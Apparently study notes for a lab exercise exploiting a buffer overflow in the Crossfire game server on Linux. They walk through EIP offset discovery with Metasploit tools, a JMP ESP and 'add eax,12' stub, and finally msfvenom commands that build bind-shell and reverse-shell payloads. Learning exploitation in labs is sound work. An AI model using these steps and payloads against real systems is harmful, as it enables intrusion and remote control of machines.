Linux Buffer Overflow

Goals

• EIP => JMP ESP => ESP containing payload
• In Crossfire: EIP => JMP ESP => EAX + 12 bytes containing payload

Default bad characters

• 0x00 (Null)
• 0x0A (New Line '\n')
• 0x0D (Carriage Return '\r')
• 0x20 (ASCII Space)

Tools

• Evans debugger: edb --run /usr/games/crossfire/bin/crossfire
• Click RUN twice to run

Crash the program with payloads

• Depends on program

Control the EIP

• /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4379
• /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 4379 -q 46367046

Finding JMP ESP

• Run the attacking payload
• EDB > Plugín > OpCodeSearcher > Opcode Search > ESP -> EIP

Need to jump 12 characters in EAX (for crossfire application)

• /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
• nasm > add eax,12
• 00000000 83C00C add eax,byte +0xc
• nasm > jmp eax
• 00000000 FFE0 jmp eax

Hence need \x83\xc0\x0c\xff\xe0 in payload to jump 12 characters.

• We updated our script to JMP ESP.

Tracing if data in ESP is reached.

• Before running crossfire, put a breakpoint at JMP ESP address

• EIP is pointing at x08134596 as expected. It is a JMP ESP.

• Press F8 Step over to execute JMP ESP (at EIP address). The program will execute first stage shell code to jump to EAX + 12. 0xc is 12 in decimal.

• Step over again to see EAX is now AAAAAAAAA…as expected. “Setup sound” is removed.

To get a shell payload for x86 local Linux target and avoid bad characters.

• Shell bind tcp: msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f python -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
• Reverse shell payload: msfvenom -p linux/x86/shell_reverse_tcp LPORT=4444 -f python -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai